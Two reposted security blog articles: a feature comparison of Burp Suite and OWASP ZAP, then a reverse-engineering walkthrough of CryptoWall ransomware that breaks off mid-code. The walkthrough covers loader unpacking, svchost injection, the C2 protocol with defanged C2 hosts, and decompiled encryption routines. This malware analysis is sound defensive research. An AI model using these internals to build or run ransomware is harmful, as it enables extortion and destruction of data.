Burp Suite vs OWASP ZAP – a Comparison series

Burp Suite vs OWASP ZAP – a Comparison series

Original text by Jaw33sh

Burp Suite {Pro} vs OWASP ZAP! Does more expensive mean better?

In this post, I would like to document some of the differences between the two most renowned interception proxies used by penetration testers as well as DevSecOps teams around the globe.

:::DISCLAIMER:::

I am no expert in both tools; however, I have used them enough to feel good about documenting their features in this post. Please comment if you see an error or you want to point something I missed.

Introduction

Both OWASP ZAP and Burp Suite are considered intercepting proxies (on steroids) that sits between the browser and the webserver to intercept and manipulate requests exchange.

OWASP ZAP is a free and open-source project actively maintained by volunteers while Burp Suite is a commercial Product maintained and sold by PortSwigger, They have been selected almost on every top 10 tools of the year, and in this post, I will compare version 2020.x of burp suite which saw the first release on January 2020.

We can see since they emerged to the market, they are gaining more and more momentum and users as we see in google trends for the past 5 years (2015-2020). Hopefully, by the end of this post, you will get a better understanding of their similarities and differences.

Trends between 2015 and 2020
Google Trends showing Burp suite in blue and OWASP ZAP in Red

I will discuss the differences between both tools in regards to the following aspects:

  1. Describing the User Interface
  2. Listing capabilities and features for both tools
  3. Personal User Experience with each one of them
  4. Pros and Cons of each tool 

1. User Interface

The user interface can be frustrating when you first see it. Still, after a while, it gets intuitive and has all the necessary info you need to know. Both tools have 6 simple items in their interface.

Burp Suite has a simple interface consisting of 6 simple windows.

Burp Suite 2020.2.1 User Interface
  1. Menu Bar – Provides navigation menus and tools settings
  2. Tabs Bar -Provides most of the functionality of burp in simple tabs
  3. Status Bar – Provides information for memory and disk space used by burp (new handy feature)
  4. Event Log – Provides a log for Burp Suite containing additional information
  5. Issues and Vulnerabilities window – Provides a list of detected vulnerabilities and is Active on a paid version of Burp Suite Pro or Enterprise
  6. Tasks menu – Provides simple information and control over current running, paused and finished tasks

while Zap has a simple interface consisting of also 6 simple items

ZAP 1.8.0 user interface Source: https://www.zaproxy.org/getting-started/
  1. Menu Bar – Provides access to many of the automated and manual tools.
  2. Toolbar – Includes buttons that provide easy access to most commonly used features.
  3. Tree Window – Displays the Sites tree and the Scripts tree.
  4. Workspace Window – Displays requests, responses, and scripts and allows you to edit them.
  5. Information Window – Displays details of the automated and manual tools.
  6. Footer – Displays a summary of the alerts found and the status of the main automated tools.

2. Capabilities

Both burp suite and Zap have good sets of capabilities; however, at some, a tool can excel more than the other, we will get to each one further down in separate posts.

  • Intercepting feature with SSL/TLS support and web sockets.
  • Interception History.
  • Tree navigation for scope.
  • Scope definition.
  • Manual request editor and sender.
  • Plugins, Extensions, and Marketplace/Store.
  • Vulnerability tree or Issues display.
  • Fuzzer capabilities with default lists.
  • Scan Policy configuration.
  • Report generation capability.
  • Encoders and Decoders.
  • Spider function.
  • Auto check for Update features.
  • Save and Load Project files.
  • Exposed and usable APIs .
  • Passive and Active scan engine.
  • Session Token entropy Analysis (Burp Only if you know that ZAP support this even with Addons please leave a comment).
  • Knowledge Base (Burp only, as ZAP does not support that in the UI).
  • Diff-like capability or comparison feature (Burp only AFAIK no support out of the box for ZAP).
  • Support for multiple programming and scripting languages.
  • Authentication Modules like NTLM, form authentication, and so on.

I might have missed some features so please if you know a feature I missed, please comment below.

3. User experience

A while back, I had to use both tools for comparison, While I am used to Burp Suite more from the first look, OWASP ZAP does the same functionality but has to be enhanced with plugins. keep in mind there is an easy learning curve for both.
For example, ZAP has one fuzzer window, which makes it harder to search in fuzzer results, especially when you run multiple fuzzers. At the same time, burp has different windows and configuration for each fuzz conducted. the same goes for other features.
Unlike Burp, You can’t change (add, edit or remove) HTTP headers in ZAP fuzzer window. That gives Burp an edge because it allows you to sort or search in fuzzing results faster and effectively.

zap fuzzer
Zap 2.8.0 Fuzzer window
burp fuzzer configuratability
Burp 2020.2.1 Fuzzer window

which one do you find intuitive?

One big plus for Burp is the Comparer tab, it allows for easier change detection. Like detecting differences in size from time change or tokens and content, ZAP lacks this feature without extensions (comment bellow which ZAP plugin does that).

quickly compare request or response

Another hurdle in ZAP is the ability to search for text in the request or server response, unlike Burp, which makes it more accessible. You can search for text or regex.

Burp Repeater makes it easier to search
Zap request Editor

One more thing that makes Burp more popular than Zap is the ability to detect token entropy and randomness for cryptography analysis. Very useful when session cookies are generated manually.

Burp Sequencer run statistics on tokens and calculates Entropy

However, One big plus for Zap is its API, which makes for easier integration or automation than Burp. You access the API from the browser or other user agents like curl or SDKs/libraries.

Burp Suite community edition API can only be used to write plugins and extensions, unlike ZAP which can be used on DevOps and/or DevSecOps pipelines.

A new Burp REST API was introduced in 2018 which makes it easier to integrate burp with other tools and workflows.

An example is using the API to spider a host and getting the results, e.g. crawling testphp.vulnweb.com from the console.

This feature makes OWASP ZAP the easiest to integrate into DevSecOps pipelines no matter how big or small is your environment.

ZAP API in action

For a while, Only OWASP had good resources to learn about ZAP and web application security, but recently PortSwigger also launched a very good free Web Security academy

4. Cons and Pros of each other

In my experience, ZAP is good when it comes to DevOps/DevSecOps for it’s easier API integration and support. At the same time, Burp is more oriented towards actual vulnerability assessment and penetration testing of web applications.

At the different price points for each tool, it is up to your scenario to decide if more expensive is better. Burp Pro is priced by PortSwigger at 399 USD per user per year, While OWASP ZAP is a free and open-source project under Apache 2.0 License.

In conclusion, both tools are good in their differences and use cases. tell me which tool you like and your tips and tricks for Zap or Burp (●’◡’●)

Genetic Analysis of CryptoWall Ransomware

Genetic Analysis of CryptoWall Ransomware

Original text by Ryan Cornateanu

A strain of a Crowti ransomware emerged, the variant known as CryptoWall, was spotted by researchers in early 2013. Ransomware by nature is extraordinarily destructive but this one in particular was a bit beyond that. Over the next 2 years, with over 5.25 billion files encrypted and 1 million+ systems infected, this virus has definitely made its mark in the pool of cyber weapons. Below you can find a list of the top ten infected countries:

Image for post
Source: Dell Secure Works

CryptoWall is distinct in that its campaign ID initially gets sent back to their C2 servers for verification purposes. The motivation behind these ID’s are to track samples by the loader vectors. The one we will be analyzing in our laboratory experiment has the crypt1 ID that was first seen around February 26th, 2014. The infection vector is still unknown today but we will be showing how to unpack the loader, and extract the main ransomware file. Some of the contagions have been caused by Drive-by downloads, Cutwail/Upatre, Infinity/Goon exploit kit, Magnitude exploit kit, Nuclear exploit kit/Pony Loader, and Gozi/Neverquest.

Initial Analysis

We will start by providing the hash of the packed loader file:

➜  CryptoWall git:(master) openssl md5 cryptowall.bin
MD5(cryptowall.bin)= 47363b94cee907e2b8926c1be61150c7

Running the file command on the bin executable, we can confirm that this is a PE32 executable (GUI) Intel 80386, for MS Windows. Similar to the analysis we did on the Cozy Bear’s Beacon Loader, we will be using IDA Pro as our flavor of disassembler tools.

Loading the packed executable into our control flow graph view, it becomes apparent fairly quickly that this is packed loader code, and the real CryptoWall code is hiding somewhere within.

Image for post
WinMain CFG View

Checking the resource section of this binary only shows that it has two valid entries; the first one being a size of 91,740 bytes. Maybe we will get lucky and the hidden PE will be here?

Image for post
Dumped resource section

Unfortunately not! This looks like some custom base64 encoded data that will hopefully get used later somewhere down the line in our dissection of the virus. If we scroll down to the end of WinMain() you’ll notice a jump instruction that points to EAX. It will look something like this in the decompiler view:

JUMPOUT(eax=decrypted_code_segment);

Unpacking Binary Loaders

At this point, we have to open up a debugger, and view this area of code as it is being resolved dynamically. What you will want to do is a set a breakpoint at 0x00402dda, which is the location of the jmp instruction. Once you hit this breakpoint after continuing execution, you’ll notice EAX now points to a new segment of code. Dumping EAX in the disassembler will lead you to the 2nd stage loader. Use the debugger’s step into feature, and our instruction pointer should be safely inside the decrypted loader area.

Image for post
2nd Stage

Let’s go over what is happening at this stage of the malware. EBP+var_EA6E gets loaded effectively into EDXEAX then holds the index count incrementer to follow the next few bytes at data address 302C9AEh.

.data:0302CA46   mov     bl, byte ptr (loc_302C9AE - 302C9AEh)[eax]
.data:0302CA48 add ebx, esi
.data:0302CA4A mov [edx], bl

All this snippet of code is doing is loading bytes from the address mentioned above and storing it at bl (the lower 8 bits of EBX). The byte from bl is then moved into the pointer value of EDX. At the end of this routine EBP+var_EA6E will hold a valid address that gets called as EAX (we can see the line highlighted in red in the image above). Stepping into EAX will now bring us to the third stage of the loading process.

A lot is going on at this point; this function has a couple thousand lines of assembly to go over, so at this point it’s better we open the decompiler view to see what is happening. After resolving some of the strings on the stack, there is some key information that starts to pop up on the resource section we viewed earlier.

pLockRsrc = GetProcAddress(kernel32, &LockResource);
pSizeofResource = GetProcAddress(kernel32, &SizeofResource);
pLoadResource = GetProcAddress(kernel32, &LoadResource);
pGetModuleHandle = GetProcAddress(kernel32, &GetModuleHandleA);
pFindRsrc = GetProcAddress(kernel32, &FindResourceA);
pVirtualAlloc = GetProcAddress(kernel32, &VirtualAlloc);

The malware is loading all functions dynamically that have to do with our resource section. After the data gets loaded into memory, CryptoWall begins its custom base64 decoding technique and then continues to a decryption method as seen below.

Image for post

Most of what is happening here can be explained in a decryptor I wrote that resolves the shellcode from the resource section. If you head over to the python script, you’ll notice the custom base64 decoder is fairly simple. It will use a hardcoded charset, and check to see if any of the bytes from the resource section match a byte from the charset; if it is a match, it breaks from the loop. The next character gets subtracted by one and compared to a value of zero, if greater, it will take that value and modulate by 256; that byte will then get stored in a buffer array. It will perform this in a loop 89,268 times, as that is the size of the encoded string inside the resource section.

Secondary to this, another decryption process starts on our recently decoded data from the algorithm above. Looking at the python script again, we can see that hardcoded XOR keys were extracted in the debugger if you set a breakpoint inside the decryption loop. All that is happening here is each byte is getting decrypted by a rotating three byte key. Once the loop is finished, the code will return the address of the decrypted contents, which essentially just contains an address to another subroutine:

loop:
buffer = *(base_addr + idx) - (*n ^ (&addr + 0xFFE6DF5F + idx));
*(base_addr + idx++) = buffer;

Fourth_Stage_Loader = base_addr;
return (&Fourth_Stage_Loader)(buffer, b64_decoded_str, a1);

The base_addr transfers data to another variable that we named Fourth_Stage_Loader which holds the address of the newest function, and can be used as a caller. If we dump the address at call dword ptr gs:(loc_1920A1–1920A1h)[eax] into memory, you’ll see bytes that start with a generic x86 function prologue like 55 8b ec 81. Dump this to a file, and we can actually emulate this shellcode. In doing so, we don’t have to step through all this code in the debugger; instead it will hopefully tell us how to unpack and get to the main CryptoWall file.

Side note: the python script I wrote will automatically decode & decrypt the resource section, and dump it to a bin file by running => python decrypt_shellcode_loader.py -e.

0x1000: push ebp
0x1001: mov ebp, esp
0x1003: add esp, 0xfffff004
....

An easy way to see what this next stage in the malware’s loader is doing is by using one of my favorite shellcode emulator tools called ScDbg. By using this tool, we can figure out exactly where we need to set our breakpoints in order to get to the main ransomware file. We are going to look for calls such as VirtualAllocWriteProcessMemoryCreateProcessA, etc.

C:\> scdbg.exe /s 3200000 /bp WriteProcessMemory /f dump.binLoaded 10587 bytes from file extractions/pe_process_injector_dump.bin
Breakpoint 0 set at 7c802213
Initialization Complete..
Max Steps: 3200000
Using base offset: 0x4010004011cf GetProcAddress(LoadLibraryA)
40165f GetProcAddress(VirtualAlloc)
401c46 GetProcAddress(GetCurrentProcessId)
401c52 GetCurrentProcessId() = 29
...
401d46 CloseHandle(18be)
401f40 VirtualAlloc(base=0 , sz=20400) = 600000
4021e1 VirtualAllocEx(pid=1269, base=400000 , sz=25000) = 621000
/* Breakpoint 0 hit at: 7c802213 */
4021fe WriteProcessMemory(pid=1269, base=400000 , buf=600000, sz=400, written=12fd70)
/* Breakpoint 0 hit at: 7c802213 */
40224e WriteProcessMemory(pid=1269, base=401000 , buf=600400, sz=16400, written=12fd70)

Interesting… it looks like the malware is allocating memory to its own process by using GetCurrentProcessId() and allocating a large enough space to inject a PE file into itself. After memory allocation, CryptoWall injects the payload file twice, once for the header, and the second time for the rest of the file. If you set a breakpoint at WriteProcessMemory, and continue execution twice, you can dump the second argument (ECX) on the stack to see the hidden PE file.

Image for post

There is an Anti-VM trick along the way in the 3rd stage part of the loader process that needs to be patched in order to hit the injection process, so I wrote an x32Dbg python plugin to help automate the patching and dumping operation.

Reversing the Main Crypto Binary

CryptoWall’s entry point starts off by dynamically resolving all imports to obtain all of NTDLL’s offsets by using the process environment block.

Image for post

It will then call a subroutine that is responsible for using the base address of the loaded DLL and uses many hardcoded DWORD addresses to locate hundreds of functions.

Side Note: If you would like to make your life a whole lot easier with resolving the function names in each subroutine, I made a local type definition for IDA Pro over here. The resolving import function table will look a lot cleaner than what you see above:

Image for post

After the function returns, the malware will proceed to generate a unique hash based on your system information, the resulting string will be MD5 hashed => DESKTOP-QR18J6QB0CBF8E8Intel64 Family 6 Model 70 Stepping 1, GenuineIntel. After computing the hash, it will setup a handle to an existing named event object with the specified desired access that will be called as \\BaseNamedObjects\\C6B359277232C8E248AFD89C98E96D65.

The main engine of the code starts a few routines after the malware checks for system information, events, anti-vm, and running processes.

Image for post

Most of the time the ransomware will successfully inject its main thread into svchost and not explorer; so let’s follow that trail. Since this is a 32-bit binary its going to attempt to find svchost.exe inside of SysWOW64 instead of System32. After successfully locating the full path, it will create a new thread using the RtlCreateUserThread() API call. Once the thread is created, NtResumeThread() will be used on the process to start the ransomware_thread code. Debugging these types of threads can be a little convoluted, and setting breakpoints doesn’t always work.

.text:00416F40     ransomware_thread proc near             
.text:00416F40 start+86↓o
.text:00416F40
.text:00416F40 var_14 = dword ptr -14h
.text:00416F40 var_10 = dword ptr -10h
.text:00416F40 var_C = dword ptr -0Ch
.text:00416F40 var_8 = dword ptr -8
.text:00416F40 var_4 = dword ptr -4
.text:00416F40
.text:00416F40 000 push ebp
.text:00416F41 004 mov ebp, esp
.text:00416F43 004 sub esp, 14h
.text:00416F46 018 call ResolveImportsFromDLL
...

Using x32Dbg, you can set the EIP to address 0x00416F40 since this thread is not resource dependent on any of the other code that has been executed up until this point; this thread even utilizes the ResolveImportsFromDLL function we saw in the beginning of the program’s entry point… meaning, the forced instruction pointer jump will not damage the integrity of the ransomware.

isHandleSet = SetSecurityHandle();
if ( isHandleSet && SetupC2String() )
{
v8 = 0;
v6 = 0;
IsSuccess = WhichProcessToInject(&v8, &v6);
if ( IsSuccess )
{
IsSuccess = StartThreadFromProcess(-1, InjectedThread,
0, 0, 0);
FreeVirtualMemory(v8);
}
}

The thread will go through a series of configurations that involve setting up security attributes, MD5 hashing the hostname of the infected system, and then searching to either inject new code into svchost or explorer. In order to start a new thread, the function WhichProcessToInject will query the registry path, and check permissions on what key values the malware has access to. Once chosen, the InjectedThread process will resume. Stepping into that thread, we can see the module size is fairly small.

.text:00412E80     InjectedThread  proc near               ; DATA 
.text:00412E80
.text:00412E80 000 push ebp
.text:00412E81 004 mov ebp, esp
.text:00412E83 004 call MainInjectedThread
.text:00412E88 004 push 0
.text:00412E8A 008 call ReturnFunctionName
.text:00412E8F 008 mov eax, [eax+0A4h]
.text:00412E95 008 call eax
.text:00412E97 004 xor eax, eax
.text:00412E99 004 pop ebp
.text:00412E9A 000 retn
.text:00412E9A InjectedThread endp

At address 0x00412E83, a subroutine gets called that will bring the malware to start the next series of functions that involves the C2 server configuration callback, and the encryption of files. After the thread is finished executing, EAX resolves a function at offset +0x0A4 which will show RtlExitUserThread being invoked. Once we enter MainInjectedThread, you’ll notice the first function at 0x004011B40 is giving us the first clue of how the files will be encrypted.

.text:00411D06 06C                 push    0F0000000h
.text:00411D0B 070 push 1
.text:00411D0D 074 lea edx, [ebp+reg_crypt_path]
.text:00411D10 074 push edx
.text:00411D11 078 push 0
.text:00411D13 07C lea eax, [ebp+var_8]
.text:00411D16 07C push eax
.text:00411D17 080 call ReturnFunctionName
.text:00411D1C 080 mov ecx, [eax+240h]
.text:00411D22 080 call ecx ; CryptAcquireContext

CryptAcquireContext is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). In our case, the CSP being used is Microsoft\Enhanced\Cryptographic\Provider\V1, which coincides with algorithms such as DES, HMAC, MD5, and RSA.

Image for post

Once the CryptoContext is populated, the ransomware will use the MD5 hash created to label the victim’s system information and register it as a key path as such → software\\C6B359277232C8E248AFD89C98E96D65. The ransom note is processed by a few steps. The first step is to generate the TOR addresses which end up resolving four addresses: http[:]//torforall[.]comhttp[:]//torman2[.]comhttp[:]//torwoman[.]com, and http[:]//torroadsters[.]com. These DNS records will be used later on to inject into the ransomware HTML file. Next, the note gets produced by the use of the Win32 API function, RtlDecompressBuffer, to decompress the data using COMPRESSION_FORMAT_LZNT1. The compressed ransom note can be found in the .data section and consists of 0x52B8 bytes.

Image for post

Decompressing the note is kind of a mess in python as there is no built in function that is able to do LZNT1 decompression. You can find the actual call at address 0x004087F3.

.text:004087CF 024                 lea     ecx, [ebp+var_8]
.text:004087D2 024 push ecx
.text:004087D3 028 mov edx, [ebp+arg_4]
.text:004087D6 028 push edx
.text:004087D7 02C mov eax, [ebp+arg_6]
.text:004087DA 02C push eax
.text:004087DB 030 mov ecx, [ebp+var_18]
.text:004087DE 030 push ecx
.text:004087DF 034 mov edx, [ebp+var_C]
.text:004087E2 034 push edx
.text:004087E3 038 movzx eax, [ebp+var_12]
.text:004087E7 038 push eax
.text:004087E8 03C call ReturnFunctionName
.text:004087ED 03C mov ecx, [eax+178h]
.text:004087F3 03C call ecx
// Decompiled below
(*(RtlDecompressBuffer))(COMPRESSION_FORMAT_LZNT1,
uncompressed_buffer,
UncompressedBufferSize,
CompressedBuffer,
CompressedBufferSize,
FinalUncompressedSize) )

After the function call, uncompressed_buffer will be a data filled pointer to a caller-allocated buffer (allocated from a paged or non-paged pool) that receives the decompressed data from CompressedBuffer. This parameter is required and cannot be NULL, which is why there is anNtAllocateVirtualMemory() call to this parameter before being passed to decompression. The script I wrote will grab the compressed data from the PE file, and run a LZNT1 decompression algorithm then place the buffer in an HTML file. The resulting note will appear on the victims system as such:

Image for post

Once the note is decompressed, the HTML fields will be populated with multiple TOR addresses at subroutine sub_00414160(). The note is stored in memory then follows a few more checks before the malware sends its first C2 POST request. Stepping into SendRequestToC2 which is located at 0x00416A50, the first thing we notice is a buffer being allocated 60 bytes of memory.

.text:00416A77 018                 push    3Ch
.text:00416A79 01C call AllocateSetMemory
.text:00416A7E 01C add esp, 4
.text:00416A81 018 mov [ebp+campaign_str], eax

All this information will eventually help us write a proper fake C2 server that will allow us to communicate with the ransomware since CryptoWall’s I2P servers are no longer active. Around address 0x004052E0, which we labeled EncryptData_SendToC2 will be responsible for taking our generated campaign string and sending it as an initial ping.

Image for post

If you set a breakpoint at this function, you can see what the parameter contains: {1|crypt1|C6B359277232C8E248AFD89C98E96D65}. Once inside this module, you’ll notice three key functions; one responsible for byte swapping, a key scheduling algorithm, and the other doing the actual encryption. The generated RC4 encryption will end up as a hash string:

85b088216433863bdb490295d5bd997b35998c027ed600c24d05a55cea4cb3deafdf4161e6781d2cd9aa243f5c12a717cf64944bc6ea596269871d29abd7e2

Command & Control Communication

The malware sets itself up for a POST request to its I2P addresses that cycle between proxy1–1–1.i2p & proxy2–2–2.i2p. The way this is done is by using the function at 0x0040B880 to generate a random seed based on epoch time, and use that to create a string that ranges from 11 to 16 bytes. This PRNG (Pseudo-Random Number Generator) string will be used as the POST request’s URI and as the key used in the byte swapping function before the RC4 encryption.

Image for post

To give us an example, if our generated string results in tfuzxqh6wf7mng, then after the function call, that string will turn into 67ffghmnqtuwxz. That string gets used for a 256-generated key scheduling algorithm, and the POST request (I.E., http://proxy1–1–1.i2p/67ffghmnqtuwxz). You can find the reverse engineered algorithm here.

Image for post

The next part will take this byte swapped key, then RC4 encrypt some campaign information that the malware has gathered, which unencrypted, will look like this:

{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}

This blob consists of the campaign ID, an MD5 hashed unique computer identifier, a CUUID, and the victims public IP address. After preparation of this campaign string, the ransomware will begin to resolve the two I2P addresses. Once CryptoWall sends its first ping to the C2 server, the malware expects back an RC4 encrypted string, which will contain a public key used to encrypt all the files on disk. The malware has the ability to decrypt this string using the same RC4 algorithm from earlier, and will parse the info from this block: {216|1pai7ycr7jxqkilp.onion|[pub_key]|US|[unique_id]}. The onion route is for the ransom note, and is a personalized route that the victim can enter using a TOR browser. The site most likely contains further instructions on how to pay the ransom.

Since the C2 servers are no longer active; in order to actually know what our fake C2 server should send back to the malware; the parser logic had to be carefully dissected which is located at 0x00405203.

Image for post

In this block, the malware decrypts the data it received from the C2 server. Once decrypted, it stores the first byte in ECX and compares hex value to 0x7B (char: ‘{‘). Tracing this function call to the return value, the string returned back will remove brackets from start to end. At memory address 0x00404E69, a DWORD pointer at eax+2ch holds our newly decrypted and somewhat parsed string, that will be checked for a length greater than 0. If the buffer holds weight, we move on over to the final processing of this string routine at 0x00404B00, that I dubbed ParseC2Data(). This function takes four parameters, char* datainint datain_sizechar *dataoutint dataout_size. The first blob on datain data gets parsed from the first 0x7C (char: ‘|’) and extracts the victim id.

victim_id = GetXBytesFromC2Data(decrypted_block_data_from_c2, &hex_7c, &ptr_to_data_out);

ptr_to_data_out and EAX will now hold an ID number of 216 (we got that number since we placed it there in our fake C2). The next block of code will finish the rest of the data:

while ( victim_id )
{
if ( CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
CopyBlocksofMemory(victim_id,
&some_buffer_to_copy_too[2 * idx + 1],
&some_buffer_to_copy_too[2 * idx]);
++idx;
if ( ptr_to_data_out )
{
for ( i = 0; *(i + ptr_to_data_out) == 0x7C; ++i )
{
if (
CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
++v9;
++idx;
}
}
}
}
victim_id = GetXBytesFromC2Data(0, &hex_7c_0,
&ptr_to_data_out);
++v5;
++v9;
}

What’s happening here is that by every iteration of the character ‘|’ we grab the next chunk of data and place it in memory into some type structure. The data jumps X amount of times per loop until it reaches the last 0x7C byte. It will loop a total of four times. After this function returns, dataout will contain a pointer in memory to this local type, which we reversed to look like this:

struct _C2ResponseData
{
int victim_id;
char *onion_route;
const char* szPemPubKey;
char country_code[2];
char unique_id[4];
};

Shortly after, there is a check to make sure the victim id generated is no greater than 0x3E8 or that it is not an unsigned value.

value_of_index = CheckID(*(*parsed_data_out->victim_id));
if ( value_of_index > 0x3E8 || value_of_index == 0xFFFFFFFF )
value_of_index = 0x78;

I believe certain malware will often perform these checks throughout the parsing of the C2 response server to make sure the data being fed back is authentic. Over at 0x00404F35, there is another check to see how many times it tried to reach the command server. If the check reaches exactly 3 times then it will move to check if the onion route is valid; all CryptoWall variants hardcode the first string index with ascii ‘1’. If it does not start with this number, then it will try to reach back again for a different payload. The other anti-tamper check it makes for the onion route is a CRC32 hash against the payload, if the compressed route does not equal 0x63680E35, the malware will try one last time to compare against the DWORD value of 0x30BBB749. The variant has two hardcoded 256 byte arrays to which it compares the encrypted values against. Brute-forcing can take a long time but is possible with a python script that I made here. The checksum is quite simple, it will take each letter of the site string and logical-XOR against an unsigned value:

tmp = ord(site[i])) ^ (ret_value & 0xffffff)

It will take the tmp value and use it as an index in the hardcoded byte array to perform another logical-XOR against :

ret_value = bytes_array[tmp*4:(tmp*4)+4] ^ (0xFFFFFFFF >> 8)

The return value then gets inverted giving us a 4 byte hash to verify against. Now the malware moves on over to the main thread responsible for encrypting the victims files at 0x00412988. The first function call in this thread is from CryptAcquireContextW, and that will acquire a handle to a particular key container within a CSP. 16 bytes will then be allocated to the stack using VirtualAlloc; which will be the buffer to the original key.

isDecompressed = CreateTextForRansomwareNote(0, 0, 0);
if ( !isRequestSuccess || !isDecompressed )
{
remaining_c2_data = 0;
while ( 1 )
{
isRequestSuccess = SecondRequestToC2(&rsa_key,
&rsa_key_size, &remaining_c2_data);
if ( isRequestSuccess )
break;
sleep(0x1388u);
}

Once the text for the ransom note is decompressed, CryptoWall will place this note as an HTML, PNG, and TXT file inside of every directory the virus went through to encrypt documents. After this point, it will go through another round of requests to the I2P C2 servers to request another RSA 2048-bit public key. This key will be the one used for encryption. This strain will do a number of particular hardcoded hash checks on the data it gets back from the C2.

Decoding the Key

CryptoWall will use basic Win32 Crypto functions like CryptStringToBinaryACryptDecodeObjectEx, & CryptImportPublicKeyInfo to decode the RSA key returned. Then it will import the public key information into the provider which then returns a handle of the public key. After importing is finished, all stored data will go into a local type structure like this:

struct _KeyData
{
char *key;
int key_size;
BYTE *hash_data_1;
BYTE *hash_data_2;
};// Gets used here at 0x00412B8C
if ( ImportKey_And_EncryptKey(
cryptContext,
rsa_key,
rsa_key_size,
OriginalKey->key,
&OriginalKey->key_size,
&OriginalKey->hash_data_1,
&OriginalKey->hash_data_2) )
{

The next actions the malware takes is pretty basic for ransomware.. it will loop through every available drive, and use GetDriveTypeW to determine whether a disk drive is a removable, fixed, CD-ROM, RAM disk, or network drive. In our case, the C drive is the only open drive which falls under the category of DRIVE_FIXED. CryptoWall will only check if the drive is CD-ROM because it will not try to spread in that case.

.text:00412C1B      mov     ecx, [ebp+driver_letter]
.text:00412C1E push ecx
.text:00412C1F call GetDriveTypeW
.text:00412C2C cmp eax, 5
.text:00412C2F jz skip_drive

EAX holds the integer value returned from the function call which represents the type of drive associated with that number (5 == DRIVE_CDROM). You can find the documentation here.

The exciting part is near as we are about to head over to where the malware duplicates the key it retrieved from our fake C2 server at address 0x00412C7A. What is happening here is pretty straight forward, and we can show in pseudo-code:

if (OriginalKey)
DuplicatedKey = HeapAlloc(16)
if (DuplicatedKey)
CryptDuplicateKey(OriginalKey, 0, 0, DuplicatedKey)
memcpy(DuplicatedKey, OriginalKey, OrignalKey_size)
CryptDestroyKey(OriginalKey)

Essentially CryptDuplicateKey is making an exact copy of a key and the state of the key. The DuplicatedKey variable ends up becoming a struct as we can see after the function call at 0x00412C7A, it gets used to store volume information about the drive its currently infecting.

GetVolumeInformation(driver_letter, DuplicatedKey + 20);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
(DuplicatedKey + 16), 0) {
...

That is why 24 bytes was used to allocate to the heap when creating this variable instead of 16. Now we can define our struct from what we know so far:

struct _DupKey
{
const char *key;
int key_size;
DWORD unknown1;
DWORD unknown2;
char *drive_letter;
LPDWORD lpVolumeSerialNumber;
DWORD unknown3;
};// Now our code looks cleaner from above
GetVolumeInformation(driver_letter,
&DuplicatedKey->lpVolumeSerialNumber);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
&DuplicatedKey->drive_letter, 0) {
...

Encrypting of Files

After the malware is finished storing all pertinent information regarding how and where it will do its encryption, CryptoWall moves forward to the main encryption loop at 0x00416780.

Image for post
Encryption Loop Control Flow Graph

As we can see, the control flow graph is fairly long in this subroutine, but nothing out of the ordinary when it comes to ransomware. A lot has to be done before encrypting files. At the start of this function, we see an immediate call to HeapAlloc to allocate 260 bytes of memory. We can automatically assume this will be used to store the file’s absolute path, as Windows OS only allows a max of 260 bytes. Upon success, there is also an allocation of virtual memory with a size of 592 bytes that will later be used as the file buffer contents. Then the API call FindFirstFileW uses this newly allocated buffer to store the first filename found on system. The pseudo-code below will explain the flow:

lpFileName = Allocate260BlockOfMemory(); // HeapAlloc
if ( lpFileName )
{
(*(wcscpy + 292))(lpFileName, driver_letter);
...
lpFindFileData = AllocateSetMemory(592); // VirtualAlloc
if ( lpFindFileData )
{
hFile = (*(FindFirstFileW + 504))(lpFileName, lpFindFileData);
if ( hFile != 0xFFFFFFFF )
{
v29 = 0;
do
{
// Continue down to further file actions

Before the malware opens up the first victim file, it needs to make sure the file and file extension themselves are not part of their hardcoded blacklist of bytes. It does this check using a simple CRC-32 hash check. It will take the filename, and extension; compress it down to a DWORD, then compare that DWORD to a list of bytes that live in the .data section.

Image for post

To see how the algorithm works, I reversed it to python code, and wrote my own file checker.

➜  python tor_site_checksum_finder.py --check-file-ext "dll"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[-] '.dll' is not a valid file extension for Cryptowall

➜ python tor_site_checksum_finder.py --check-file-ext "py"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[+] '.py' is a valid file extension for Cryptowall

Now we can easily tell what type of files CryptoWall will attack. Obvious extensions like .dll.exe, and .sys is a very common file type for ransomware to avoid.

Image for post

If the file passes these two checks, then it moves on over to the last part of the equation; the actual encryption located at 0x00412260. We can skip the first few function calls as they are not pertinent to what is about to happen. If you take a look at address 0x00412358, there is a subroutine that takes in three parameters; a file handle, our DuplicateKeyStruct, and a file size. Stepping into the function, we can immediately tell what is happening:

if(ReadFileA(hFile, lpBuffer, 
DuplicateKeyStruct->file_hash_size,
&lpNumberOfBytesRead, 0) && lpNumberOfBytesRead) ==
DuplicateKeyStruct->file_hash_size
{
if(memcmp(lpBuffer, DuplicateKeyStruct->file_hash,
DuplicateKeyStruct->file_hash_size))
{
isCompare = 1;
}
}

The pseudo-code is telling us that if an MD5 hash of the file is present in the header, then its already been encrypted. If this function returns isCompared to be true, then CryptoWall moves on to another file and will leave this one alone. If it returns false from the Compare16ByteHeader() function call, the malware will append to the file’s extension by using a simple algorithm to generate a three lettered string to place at the end. The generation takes a timestamp, uses it as a seed, and takes that seed to then mod the first three bytes by 26 then added to 97.

*(v8 + 2 * i) = DataSizeBasedOnSeed(0, 0x3E8u) % 26 + 97;

This is essentially a rotation cipher, where you have a numerical variable checked by a modulate to ensure it doesn’t go past alphanumeric values, then the addition to 97 rotates the ordinal 45 times. As an example, if we have the letter ‘A’, then after this cipher, it ends up becoming an ’n’. In conclusion, if the victim file is named hello.py, this subroutine will rename it to hello.py.3xy.

Next, around address 0x004123F0, the generation of an AES-256 key begins with another call to Win32’s CryptAcquireContextW. The phProv handler gets passed over to be used in CryptGenKey and CryptGetKeyParam.

if ( CryptGenKey(hProv, 0x6610, 1, &hKey) ):
pbData_1 = 0;
pdwDataLen_1 = 4;
if ( CryptGetKeyParam(hKey, 8, &pbData_1, &pdwDataLen_1, 0, 4)

